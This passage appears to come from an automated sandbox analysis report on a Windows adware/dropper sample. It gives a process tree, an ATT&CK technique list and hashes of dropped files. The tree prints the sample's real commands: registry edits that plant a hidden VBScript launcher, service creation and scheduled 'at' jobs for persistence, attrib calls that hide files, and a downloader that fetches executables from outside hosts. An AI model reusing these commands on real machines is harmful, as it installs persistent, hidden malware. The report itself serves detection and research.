      PID:3588
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKEY_CLASSES_ROOT\CLSID\{00000108-0000-0010-8000-00AA006DAAAA}\shell" /ve /t REG_SZ /d "┤≥┐¬╓≈╥│(&H)" /f
      4⤵
      Modifies registry class
      PID:1016
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKEY_CLASSES_ROOT\CLSID\{00000108-0000-0010-8000-00AA006DAAAA}\shell\┤≥┐¬╓≈╥│(&H)"
      4⤵
      Modifies registry class
      PID:1224
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKEY_CLASSES_ROOT\CLSID\{00000108-0000-0010-8000-00AA006DAAAA}\shell\┤≥┐¬╓≈╥│(&H)" /v "MUIVerb" /t REG_SZ /d "@shdoclc.dll,-10241" /f
      4⤵
      Modifies registry class
      PID:4060
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKEY_CLASSES_ROOT\CLSID\{00000108-0000-0010-8000-00AA006DAAAA}\shell\┤≥┐¬╓≈╥│(&H)\Command"
      4⤵
      Modifies registry class
      PID:4456
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKEY_CLASSES_ROOT\CLSID\{00000108-0000-0010-8000-00AA006DAAAA}\shell\┤≥┐¬╓≈╥│(&H)\Command" /ve /t REG_SZ /d "wscript.exe c:\progra~1\software\Microsoft\win.vbs" /f
      4⤵
      Modifies registry class
      PID:1780
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKEY_CLASSES_ROOT\CLSID\{00000108-0000-0010-8000-00AA006DAAAA}\shell\╩⌠╨╘(&R)"
      4⤵
      Modifies registry class
      PID:4468
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKEY_CLASSES_ROOT\CLSID\{00000108-0000-0010-8000-00AA006DAAAA}\shell\╩⌠╨╘(&R)\Command"
      4⤵
      Modifies registry class
      PID:4112
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKEY_CLASSES_ROOT\CLSID\{00000108-0000-0010-8000-00AA006DAAAA}\shell\╩⌠╨╘(&R)\Command" /ve /t REG_SZ /d "rundll32.exe shell32.dll,Control_RunDLL INETCPL.CPL,,0" /f REG ADD "HKEY_CLASSES_ROOT\CLSID\{00000108-0000-0010-8000-00AA006DAAAA}\ShellFolder"
      4⤵
      PID:2016
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKEY_CLASSES_ROOT\CLSID\{00000108-0000-0010-8000-00AA006DAAAA}\ShellFolder" /v "Attributes" /t REG_DWORD /d 0 /f
      4⤵
      Modifies registry class
      PID:2968
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKEY_CLASSES_ROOT\CLSID\{00000108-0000-0010-8000-00AA006DAAAA}\ShellFolder" /v "HideFolderVerbs" /t REG_SZ /d "" /f
      4⤵
      Modifies registry class
      PID:1516
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKEY_CLASSES_ROOT\CLSID\{00000108-0000-0010-8000-00AA006DAAAA}\ShellFolder" /v "HideOnDesktopPerUser" /t REG_SZ /d "" /f
      4⤵
      Modifies registry class
      PID:1756
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKEY_CLASSES_ROOT\CLSID\{00000108-0000-0010-8000-00AA006DAAAA}\ShellFolder" /v "WantsParsDisplayName" /t REG_SZ /d "" /f
      4⤵
      Modifies registry class
      PID:1228
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /C .\runonce.cmd
    3⤵
    PID:4612
  - - C:\Windows\SysWOW64\sc.exe
      sc create Schedule binpath= "C:\Windows\svchost.exe -k netsvcs" depend= rpcss start= auto displayname= "Task Scheduler"
      4⤵
      Launches sc.exe
      PID:5016
  - - C:\Windows\SysWOW64\sc.exe
      sc config Schedule start= auto
      4⤵
      Launches sc.exe
      PID:4260
  - - C:\Windows\SysWOW64\net.exe
      net start "Task Scheduler"
      4⤵
      PID:1504
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 start "Task Scheduler"
        5⤵
        
        PID:2180
  - - C:\Windows\SysWOW64\at.exe
      at 8:00 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{00000108-0000-0010-8000-00AA006DAAAA}"
      4⤵
      PID:3132
  - - C:\Windows\SysWOW64\at.exe
      at 11:00 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{00000108-0000-0010-8000-00AA006DAAAA}"
      4⤵
      PID:4924
  - - C:\Windows\SysWOW64\at.exe
      at 14:00 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{00000108-0000-0010-8000-00AA006DAAAA}"
      4⤵
      PID:880
  - - C:\Windows\SysWOW64\at.exe
      at 17:00 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{00000108-0000-0010-8000-00AA006DAAAA}"
      4⤵
      PID:5068
  - - C:\Windows\SysWOW64\at.exe
      at 21:00 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{00000108-0000-0010-8000-00AA006DAAAA}"
      4⤵
      PID:2584
  - - C:\Windows\SysWOW64\at.exe
      at 23:00 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{00000108-0000-0010-8000-00AA006DAAAA}"
      4⤵
      PID:2692
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /C .\360.cmd
    3⤵
    - Drops file in Program Files directory
    PID:4140
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /C .\fav.cmd
    3⤵
    - Drops file in Program Files directory
    PID:3440
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /C .\copy.cmd
    3⤵
    - Drops file in Program Files directory
    PID:4680
  - - C:\Windows\SysWOW64\attrib.exe
      attrib +r +h +s "C:\Program Files\software\Microsoft\win.vbs"
      4⤵
      Sets file to hidden
      Drops file in Program Files directory
      Views/modifies file attributes
      PID:704
  - - C:\Windows\SysWOW64\attrib.exe
      attrib +r +h +s "C:\Program Files\software\fav\fav.cmd"
      4⤵
      Sets file to hidden
      Drops file in Program Files directory
      Views/modifies file attributes
      PID:3336
  - - C:\Windows\SysWOW64\attrib.exe
      attrib +r +h +s "C:\Program Files\software\360SE.vbs"
      4⤵
      Sets file to hidden
      Drops file in Program Files directory
      Views/modifies file attributes
      PID:4792
  - - C:\Windows\SysWOW64\attrib.exe
      attrib +r +h +s "C:\Program Files\software\36OSE.vbs"
      4⤵
      Sets file to hidden
      Drops file in Program Files directory
      Views/modifies file attributes
      PID:4724
  - - C:\Windows\SysWOW64\attrib.exe
      attrib +r +h +s "C:\Program Files\software\tool.cmd"
      4⤵
      Sets file to hidden
      Drops file in Program Files directory
      Views/modifies file attributes
      PID:4440
  - - C:\Windows\SysWOW64\attrib.exe
      attrib +r +h +s "C:\Program Files\software\360.cmd"
      4⤵
      Sets file to hidden
      Drops file in Program Files directory
      Views/modifies file attributes
      PID:5088
  - - C:\Windows\SysWOW64\attrib.exe
      attrib +r +h +s "C:\Program Files\software\361.cmd"
      4⤵
      Sets file to hidden
      Drops file in Program Files directory
      Views/modifies file attributes
      PID:380
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /C .\cpa.cmd
    3⤵
    PID:4596
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\msn.exe
      ".\msn.exe"
      4⤵
      Executes dropped EXE
      Checks computer location settings
      PID:3960
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX1\ks.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RarSFX1\ks.exe" "http://download.youbak.com/msn/software/partner/36a.exe"
        5⤵
        Executes dropped EXE
        
        PID:4208
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX1\ks.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RarSFX1\ks.exe" "http://soft.downxiazai.info/soft/YoudaoDict_zhusha_quantui_001.exe"
        5⤵
        Executes dropped EXE
        Checks computer location settings
        
        PID:4608
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX1\ks.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RarSFX1\ks.exe" "http://www.xunlei6x.com/msn/software/partner/1/chic7.exe"
        5⤵
        Executes dropped EXE
        Checks computer location settings
        
        PID:1800
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /C del .\runonce.cmd
    3⤵
    PID:4328

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Hidden Files and Directories

T1158

New Service

T1050

Privilege Escalation

New Service

T1050

Defense Evasion

Hidden Files and Directories

T1158

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files\software\360.cmd

Filesize
1KB

MD5
ff9a3f5f87b9227acdf8c08482bd722a

SHA1
140a90a6f122c482aad0534f86c4939923807ccd

SHA256
a70d151c858a9ce50846784db0a8af1ce33949a6c9ab7da5f15b7fefc7b4582f

SHA512
c1c28a77aee5b026576fe6b87da51233039a261a57f1b8f844db4115f50b982d70ab0ca31a739281ecc76f1cc10655f242870963de0a72c7360f44aa8304d4eb

Download Submit
C:\Program Files\software\360SE.vbs

Filesize
187B

MD5
dc5f8958cfa7fddcde52876366e5903e

SHA1
cdbcb623494abfb34deec3cf82a5077b789a8101

SHA256
a315b89bc3dc4e90ac23e1b2de674033f713d251fa211fd30843663a996ad303

SHA512
8640bf96c369fe2863906b3f0b192f38fc8cac21e7e73ca20fda8e829e97a696a6f4c5b8c740363ae93373e8457f84514f0a9b9d318974fbe3be5d58fa3c2b0e

Download Submit
C:\Program Files\software\361.cmd

Filesize
412B

MD5
a9b082e465f032fc809861f0b32e4640

SHA1
19b39ac2d6b9a26e5788c54c57f2f078a82ef4a9

SHA256
edff4596b81bdaef140f626489d8bf35e9c986ac6d1329696896530fe4fe21c2

SHA512
1047c2ef67a7350eb0c972e63a44afcb97665ff84aa1af737fbb813bb20b5ea3e0d88d69516239d563161a0d2bacc68c39f80da7ff19d876d7c725366a51d0fa

Download Submit
C:\Program Files\software\36OSE.vbs

Filesize
168B

MD5
caf701f4a9eb993e48a9a156d0eb7a40

SHA1
d20c703772d434116b837fc6df179c5906e456a9

SHA256
a8bcdf1b1135fd5812c442481875291797662f0e66662e4de271d84d39296324

SHA512
046ada088b87e5acc754d8a5807763d7393d70697c9875325959a3215b5fc90bc331754280e228441ffc38eaab47baf43d438e95f1cd5d124b828cba384500b6

Download Submit
C:\Program Files\software\Microsoft\win.vbs

Filesize
162B

MD5
d8864c2265959f7c48224b03140a4a49

SHA1
31b299ea2e43053dc84edbff3330bb8a5c9d7fdb

SHA256
c37c336035f6590e85a85fff2b190c91c5be0decc244422de650f40a1beeb6b1

SHA512
3011f99cd692d943057dbaf1dbb645a2376c8a726203054e7b9efdb37c3905e9195ef4ec167c2ea220309a50b67c0db227011b9f625dd82ef597e7fff75788f9

Download Submit
C:\Program Files\software\fav\fav.cmd

Filesize
326B

MD5
29c044a690d5494a121d7a6b6d30da3d

SHA1
c2e78d6813912c0d5a891ca8f66fe3bfd050ab9a

SHA256
978de380212914478b05d3196d9bedce918b763059d94bca1c5e2b0adc094abe

SHA512
a928b5742c57b4c2e95d1231ca418256bba240274e072f9bf1388aba9d5d1dfe93f3e1044acac13d41f02c2c68912d910fd74a9966271fa08e3ff59b796ad826

Download Submit
C:\Program Files\software\tool.cmd

Filesize
3KB

MD5
d6dd4c0778ad81c2c1aaf374215197b0

SHA1
66955616f3dbaa5f0412fa942c9f86d0d95558a0

SHA256
053280d7542c1c4a3972b714dbf19199d39a79f21ca49715014790c2cd8d5173

SHA512
d6703b3ec2c6603473f8ae89ad248f6eea53c93e66dc2a0e9b52272c397ae0684b7bf32ddf097aa849b2d3bba10620e8d8095ff2f40bb03890f011096fc1395f

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776

Filesize
471B

MD5
65f24090ffb72280bcf05c7ed340bfec

SHA1
7371a4493868cc1818a48bf7f0f3730c15ecde7f

SHA256
e8db62d610248277631a36310634399779a15c05ebbef6caaf701f71fd593826

SHA512
7bc1e220ec0e157246722928101c4b91e73739e2d319f7e6f4fc74cd229ce447cadd2b5b4d73ad00493473caa15a8f8b54cfa2c691831536e72290ea25ea72e0

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776

Filesize
434B

MD5
099a7fcded3a72a6cc66a958bcd9fbb7

SHA1
dc3a1422060f021c5d1a0cf8fad8defca0f6de9a

SHA256
be0d2fdc8bf8e9bf177594d3415b23dac5834e7d5025c61a90052e7d79a86ac3

SHA512
0639526ebee2b7250b6dd4d34f77c900488f374c8caaf4cadc96a10a88a8e4d16b8373f3a3dbac5b3764fa50c1d09111c121f6f3b6ab1f3863fca7ff6a56b162

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\360.cmd

Filesize
1KB

MD5
ff9a3f5f87b9227acdf8c08482bd722a

SHA1
140a90a6f122c482aad0534f86c4939923807ccd

SHA256
a70d151c858a9ce50846784db0a8af1ce33949a6c9ab7da5f15b7fefc7b4582f

SHA512
c1c28a77aee5b026576fe6b87da51233039a261a57f1b8f844db4115f50b982d70ab0ca31a739281ecc76f1cc10655f242870963de0a72c7360f44aa8304d4eb

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\360SE.vbs

Filesize
187B

MD5
dc5f8958cfa7fddcde52876366e5903e

SHA1
cdbcb623494abfb34deec3cf82a5077b789a8101

SHA256
a315b89bc3dc4e90ac23e1b2de674033f713d251fa211fd30843663a996ad303

SHA512
8640bf96c369fe2863906b3f0b192f38fc8cac21e7e73ca20fda8e829e97a696a6f4c5b8c740363ae93373e8457f84514f0a9b9d318974fbe3be5d58fa3c2b0e

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\361.cmd

Filesize
412B

MD5
a9b082e465f032fc809861f0b32e4640

SHA1
19b39ac2d6b9a26e5788c54c57f2f078a82ef4a9

SHA256
edff4596b81bdaef140f626489d8bf35e9c986ac6d1329696896530fe4fe21c2

SHA512
1047c2ef67a7350eb0c972e63a44afcb97665ff84aa1af737fbb813bb20b5ea3e0d88d69516239d563161a0d2bacc68c39f80da7ff19d876d7c725366a51d0fa

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\36OSE.vbs

Filesize
168B

MD5
caf701f4a9eb993e48a9a156d0eb7a40

SHA1
d20c703772d434116b837fc6df179c5906e456a9

SHA256
a8bcdf1b1135fd5812c442481875291797662f0e66662e4de271d84d39296324

SHA512
046ada088b87e5acc754d8a5807763d7393d70697c9875325959a3215b5fc90bc331754280e228441ffc38eaab47baf43d438e95f1cd5d124b828cba384500b6

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\36O安全浏览器 3.lnk

Filesize
657B

MD5
d507cdb959d9fed4893eb148d3346169

SHA1
c8db177f03f89e4a741127b1014a3858dad02de1

SHA256
46f8f0e080e7f8151cdd6de234cff828ed8bc9c76218448335629568faa79ad4

SHA512
fb22e74672af01ef42c3dd9bbec2c097ecb20823015181c7d11a732c4cb767299fdd7f25db6f593813b772cf86ded652fc0ce13291c8c9c83fd2bad8d0004bbb

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\36O安全浏览器 3.lnk

Filesize
1KB

MD5
7780bce2b144e791985b98586db03ff1

SHA1
e4277617c25db8faeba78460b3582a5ff8eca1e2

SHA256
c3cb5a90723612cc745dacb79d0c98b2d2d33e07fd50ed9842fcaf192d5ce4ce

SHA512
32e13b0c68826221160c72e40ff26ca17b85d5efafd58dcf96e708eb5f2c2f12c3264a174f8eaefa819c162e82414071b4d04ea34250f1aa4cefb8fb5cd29904

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\Internet Expl0rer.lnk

Filesize
104B

MD5
f8d9537b38d1ca9dd96796e0e4259e2d

SHA1
3d1a69967051482d528a357095f0e3b146490256

SHA256
7630b4987c74a6607b64aec726d7f0f2bf4f48793e88463d54f50be34a38d6ad

SHA512
f0ac037196a0f6c7a1c9e976cca1f361179dcbb92f25787fd48b3453d043089f2f0ed970d7da44e5f935991ba697827bc24a7957973908cd91525d4a2c53a319

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\copy.cmd

Filesize
2KB

MD5
d561f3dafa5d4501fcc9683c335e5ae7

SHA1
c18c49345bd8b29cde2abde6b057cc09d1720ac3

SHA256
74d356b1bcef9f828fef448fc10317aa298ed828ecd1975156cdecd41724afdd

SHA512
a1065d2f4d637256db40a55069a7714be8ab2c3f23c508ebdcaefbfa215300e57a8c27db836da98e8b1d1e8b369a2690dc322d194ac89cc604534aa1313eaf5e

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\cpa.cmd

Filesize
37B

MD5
d102d7237ff395378654c928b119dff0

SHA1
9ac16a1749212cc8e3cf6606fc7fcbd05f750c61

SHA256
702527cd5541e09286da5e1f47f829798c6e703b1c72c97db5570d1744337f48

SHA512
cc9a17882cc48c541bd3561d2a71a4a3b75b43e07050a0c5a36e02aba78b647c6d87e392a99c60373a7ec7d034031d7cfadef06e75c91cc2f19ff280207a15f7

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\dodo.vbs

Filesize
872B

MD5
b14edccbff6659d1517131d881e1f27c

SHA1
5e8de433038c86b369ffed5100c1766e21609aeb

SHA256
e968464c26d1c7b4777c350c4741a5bf82b0b88140268eccc3ebb5be581d62e9

SHA512
45268dbe29f0e932a1f1ff08df7e4d24e3febb8631627acdd9a3bb6ff2ab08f049b7a789c399f3cef3d82cc643f88acf4391542808c8d42f7932ef34def9d2c2

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\fav.cmd

Filesize
326B

MD5
29c044a690d5494a121d7a6b6d30da3d

SHA1
c2e78d6813912c0d5a891ca8f66fe3bfd050ab9a

SHA256
978de380212914478b05d3196d9bedce918b763059d94bca1c5e2b0adc094abe

SHA512
a928b5742c57b4c2e95d1231ca418256bba240274e072f9bf1388aba9d5d1dfe93f3e1044acac13d41f02c2c68912d910fd74a9966271fa08e3ff59b796ad826

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\msn.exe

Filesize
303KB

MD5
ecc81de295388083498801bfbc8a1903

SHA1
1f44f502d9ec0e344eca4b50d0169ec724130ffe

SHA256
264ecc10dc65a4d149072244d3461b7d8cb6900c4d274367ca898bd433e7b675

SHA512
d233e0d5480095e4fd95bc1733f6ea76ccf7061e51a08112c096cfa91d1366d1ffb5320a430845dbbf04f9111ab44cb8ebfbe75182361d2510e481ea279ceb45

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\msn.exe

Filesize
303KB

MD5
ecc81de295388083498801bfbc8a1903

SHA1
1f44f502d9ec0e344eca4b50d0169ec724130ffe

SHA256
264ecc10dc65a4d149072244d3461b7d8cb6900c4d274367ca898bd433e7b675

SHA512
d233e0d5480095e4fd95bc1733f6ea76ccf7061e51a08112c096cfa91d1366d1ffb5320a430845dbbf04f9111ab44cb8ebfbe75182361d2510e481ea279ceb45

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\runonce.cmd

Filesize
1KB

MD5
f8a56c9523b40d30a6c7d3fdd0596c41

SHA1
0ec063d849ee945a3786861ab6bcdeb2490f78a3

SHA256
63f22fb34c55f0e3c819fbbcdf78211a6d554408657f4790dbf0c6ec9e119755

SHA512
f01f87da52c90ca5578b8526df998665719a895d26dd645b04d15694c631b83afa91837c049e775b1b2994322f9a33b5f340a5844efb9fd64e20c26dd12d27d9

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\setup_free_u.vbs

Filesize
1KB

MD5
2e4b92e4e462be4820e90390de9e4e25

SHA1
ae98dc0a9fb1050736ee107a387664a6eecc05b9

SHA256
1389a31bfeb47e4c10bd8a8d92de794069bfc1a7bc932ea9ee7fd993412c76a1

SHA512
a79302bcd2d77ed6f13ad94a6e791f27c895fd3df680b45f0b6ac23fc87ce5017233351507172cb1beec50defd69dff87c7e789fcb22d3d70f60f6da4a326a9f

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\software.vbs

Filesize
996B

MD5
c5117f8d68f5315ae984e057e7ea44a5

SHA1
c216931e5dd658ee879c1abdba845a6b2d19983c

SHA256
b35914093751954a49b23f824742feb11827fcc4bcf4750ac29aaed892f0bb8a

SHA512
2cf86754fc35c38402ee16c4507a693b67743064100eb38fdeff79de72343fbcca6a3312a414337058efa914b341136a86bb894761c4c36dac565994d3094d6e

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\tao.ico

Filesize
16KB

MD5
4a085369ed417129dbf07e9c2dbe06bc

SHA1
0bcb813686eccf8cdc7921232fd3ff6c2a023af8

SHA256
c6031d14a1e77542c3c46941d3c296e81206e6f2bc09c4b621a66732ae80e6dc

SHA512
0539d5b4cd84a8f5964f9fb63f22b5b87fc31ae50239bcf3fd431db8a29c15f333f004b31c98fd10d965aa1b3b999f92bf7222286a64fec627aa770954515892

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\tj.cmd

Filesize
1KB

MD5
3ed9a0c6984ea5e46491d42c0b5a52c9

SHA1
e57ed1a7aec9e68b1f9fabf4566bda71093198c7

SHA256
fa3971f08941880b78314e12e9df13608b99021df1b5e6245f50ffedc918dce7

SHA512
f4f0e363d37e97d5f5addba4b5003e927788273799eb6f6cd5ceaaa9fa85acce189220321f5f1fd2af97e4a64cc79ffe0f1439ee781a6c56ef72779b67103c04

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\tool.cmd

Filesize
3KB

MD5
d6dd4c0778ad81c2c1aaf374215197b0

SHA1
66955616f3dbaa5f0412fa942c9f86d0d95558a0

SHA256
053280d7542c1c4a3972b714dbf19199d39a79f21ca49715014790c2cd8d5173

SHA512
d6703b3ec2c6603473f8ae89ad248f6eea53c93e66dc2a0e9b52272c397ae0684b7bf32ddf097aa849b2d3bba10620e8d8095ff2f40bb03890f011096fc1395f

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\win.vbs

Filesize
162B

MD5
d8864c2265959f7c48224b03140a4a49

SHA1
31b299ea2e43053dc84edbff3330bb8a5c9d7fdb

SHA256
c37c336035f6590e85a85fff2b190c91c5be0decc244422de650f40a1beeb6b1

SHA512
3011f99cd692d943057dbaf1dbb645a2376c8a726203054e7b9efdb37c3905e9195ef4ec167c2ea220309a50b67c0db227011b9f625dd82ef597e7fff75788f9

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\淘宝购物.url

Filesize
189B

MD5
63f72e0adad2913f0616ac0304e07b0c

SHA1
5af6726532b9cf9c17641d43e1d057ffdb33de18

SHA256
bdb784a299056e551ffecf5402e49f99a5ad988c1b6456f03a9450f210775845

SHA512
e6021a009591273b3bea14dde6d0332dbff09ff921f43f10d55c83ba615d3d313d4f32b648c2dfe531b4ca9eda465e6b07b43b02b558252ac56517c3cb0c0b17

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\网址导航.url

Filesize
81B

MD5
97c3f90dfc6b49091e3b0ac2f4c5081e

SHA1
1308208ed83e3682e9d2d8e4756c889e8a652cc2

SHA256
9a66e3c8845ef59301b675977c8c7023fa61bd3a051f6c34039eaad62a43af1b

SHA512
ee68548709f725ef3a78d7159261640e6c0503bcc278788e28e1925330741ac11283cfff9ee62716210691b93dbb58eccd249f2235b23eaa1d52e8eb49cc10b1

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\软件下载.url

Filesize
83B

MD5
e37d61e59cabe1cb70c4c3621eedb6f2

SHA1
744c090f60fd5c2c95486ce5aa9ca721df94bd23

SHA256
981ef6de8d54f921744ae45bc289616186ac6a1e05ad4fec0471efc768f5dee1

SHA512
2f396e56f238933a6078961bf943037bb0b95251cd65cb86d7bbf46b9b078c9e061ef691a5848eb9aebb6154f5528b7d59a7cfab601646a1c58a82e8cf8004cb

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX1\ks.exe

Filesize
493KB

MD5
adb777c5bdaf9587960a403f4d5455d1

SHA1
cd5308955baf629b11f886fa656baf03227b9b11

SHA256
98f7a5a408d676788eb894080ab3a874c0ed8d4a692167c929ea09b25d733b59

SHA512
ec968c076a8a7349fb3ed750765dc95886b43c45611d6ef87f0685e41e20efd186d63256a17ff7f2a51ae8151922764fd0f4ce7ddcdcb3ac8f02df9c30ad2e38

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX1\ks.exe

Filesize
493KB

MD5
adb777c5bdaf9587960a403f4d5455d1

SHA1
cd5308955baf629b11f886fa656baf03227b9b11

SHA256
98f7a5a408d676788eb894080ab3a874c0ed8d4a692167c929ea09b25d733b59

SHA512
ec968c076a8a7349fb3ed750765dc95886b43c45611d6ef87f0685e41e20efd186d63256a17ff7f2a51ae8151922764fd0f4ce7ddcdcb3ac8f02df9c30ad2e38

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX1\ks.exe

Filesize
493KB

MD5
adb777c5bdaf9587960a403f4d5455d1

SHA1
cd5308955baf629b11f886fa656baf03227b9b11

SHA256
98f7a5a408d676788eb894080ab3a874c0ed8d4a692167c929ea09b25d733b59

SHA512
ec968c076a8a7349fb3ed750765dc95886b43c45611d6ef87f0685e41e20efd186d63256a17ff7f2a51ae8151922764fd0f4ce7ddcdcb3ac8f02df9c30ad2e38

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX1\ks.exe

Filesize
493KB

MD5
adb777c5bdaf9587960a403f4d5455d1

SHA1
cd5308955baf629b11f886fa656baf03227b9b11

SHA256
98f7a5a408d676788eb894080ab3a874c0ed8d4a692167c929ea09b25d733b59

SHA512
ec968c076a8a7349fb3ed750765dc95886b43c45611d6ef87f0685e41e20efd186d63256a17ff7f2a51ae8151922764fd0f4ce7ddcdcb3ac8f02df9c30ad2e38

Download Submit

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads